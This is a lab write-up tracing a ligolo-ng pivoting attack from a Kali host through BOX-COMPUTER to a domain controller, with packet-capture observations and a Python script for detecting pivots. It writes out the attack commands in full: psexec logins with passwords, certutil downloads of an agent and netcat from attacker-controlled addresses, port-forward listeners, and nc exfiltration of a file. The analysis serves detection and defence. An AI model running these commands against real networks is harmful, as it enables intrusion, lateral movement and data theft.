I started a network capture on BOX-COMPUTER and DC01, on all interfaces, during a simple pivoting setup. The captures below highlight the packets that contextualise the attacker's behaviour at each step. This is not meant to be a tutorial for ligolo-ng.
| Host | IP |
|---|---|
| kali | 192.168.18.128 |
| BOX-COMPUTER | 192.168.18.5, 10.10.15.128 |
| DC01 | 10.10.15.10 |
SMB/Windows Admin Shares
kali compromises BOX-COMPUTER:
impacket-psexec webby/john:'P@ssw0rd'@192.168.18.5
Ingress Tool Transfer
Agent file downloaded to BOX-COMPUTER:
certutil -urlcache -f http://192.168.18.128/c2/agent.exe .\agent.exe
Agent connects back to kali:
.\agent.exe -connect 192.168.18.128:11601 -ignore-cert
Protocol Tunneling
BOX-COMPUTER Capture of the first handshake
interface shown in ligolo console
Add a route to the internal subnet and start tunnelling through the agent.
Add a listener on the agent that forwards to kali's web server:
listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80
kali compromises DC01 through the tunnel:
impacket-psexec webby/Administrator:'P@ssw0rd'@10.10.15.10
Despite capturing on both interfaces, the BOX-COMPUTER capture can no longer see kali's activity in the internal subnet, because the tunnel encapsulates and encrypts it. From here on, every packet kali sends into the internal subnet is carried encrypted within this tunnel.
DC01 capture shows BOX-COMPUTER as the origin of psexec login
DC01 downloads nc64.exe through the forwarded port:
certutil -urlcache -f http://10.10.15.128:8888/revshell/nc64.exe .\nc64.exe
DC01 capture shows BOX-COMPUTER hosting a web server, because of the port forwarding in place.
kali sets up a listener on the agent and a local netcat receiver for the file:
listener_add --addr 0.0.0.0:5555 --to 0.0.0.0:5555
nc -nvlp 5555 > donottouch.txt
Exfiltration Over Alternative Protocol
From the DC01 shell, send the file to the agent:
.\nc64.exe 10.10.15.128 5555 < donottouch.txt
DC01 capture showing file contents in plaintext
kali receives the file. Note that netcat reports the peer as 127.0.0.1: the ligolo-ng proxy hands the forwarded connection to the local listener, so the receiving side's log does not show DC01 either.
listening on [any] 5555 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 46072
^C
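Correlating the roles BOX-COMPUTER plays across the two captures, as an added Python example that is not part of the original write-up: the flow summaries, host map and thresholds are constructed to mirror the captures above, and the heuristics are mine, not ligolo-ng's or any vendor's.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.10.15.0/24")          # subnet DC01 lives on
COMMON_SERVER_PORTS = {53, 80, 88, 135, 139, 389, 443, 445, 636, 3389}

# Constructed host map (BOX-COMPUTER is dual-homed, as in the write-up's table).
HOSTS = {"192.168.18.5": "BOX-COMPUTER", "10.10.15.128": "BOX-COMPUTER",
         "10.10.15.10": "DC01", "192.168.18.128": "kali"}

# Constructed flow summaries of the two captures: (src, dst, dport, bytes, seconds).
FLOWS = [
    ("192.168.18.128", "192.168.18.5", 445, 120_000, 30),        # psexec from kali
    ("192.168.18.5", "192.168.18.128", 80, 3_500_000, 4),        # certutil fetch of agent.exe
    ("192.168.18.5", "192.168.18.128", 11601, 9_000_000, 1800),  # ligolo-ng tunnel, long-lived
    ("10.10.15.128", "10.10.15.10", 445, 150_000, 40),           # psexec to DC01, seen as BOX-COMPUTER
    ("10.10.15.10", "10.10.15.128", 8888, 45_000, 3),            # nc64.exe via forwarded listener
    ("10.10.15.10", "10.10.15.128", 5555, 2_000, 1),             # plaintext nc exfil to the agent
]


def triage(flows, hosts=HOSTS, internal=INTERNAL):
    """Map per-flow observations to per-host indicators; return hosts with two or more.

    A single odd port is noise; a workstation that holds a long-lived outbound
    session to a non-standard port *and* starts acting as an SMB client or an
    ad-hoc server inside the internal subnet looks like a pivot.
    """
    indicators = defaultdict(set)
    for src, dst, dport, nbytes, secs in flows:
        src_name, dst_name = hosts.get(src, src), hosts.get(dst, dst)
        src_int, dst_int = ip_address(src) in internal, ip_address(dst) in internal
        odd_port = dport not in COMMON_SERVER_PORTS
        # Tunnel candidate: long-lived, high-volume session to a non-standard port.
        if odd_port and secs >= 600 and nbytes >= 1_000_000:
            indicators[src_name].add(f"long-lived outbound to {dst}:{dport}")
        # Internal host suddenly serving an odd port to another internal host (8888, 5555).
        if odd_port and src_int and dst_int:
            indicators[dst_name].add(f"serving {dport} to {src}")
        # SMB session into the internal subnet: the DC only ever sees the pivot as the client.
        if dport == 445 and dst_int:
            indicators[src_name].add(f"smb client to {dst_name}")
    return {h: sorted(v) for h, v in indicators.items() if len(v) >= 2}


if __name__ == "__main__":
    for host, hits in triage(FLOWS).items():
        print(host, hits)
```

Only BOX-COMPUTER accumulates indicators: kali is invisible to DC01, and DC01 itself is only ever a client or an SMB server.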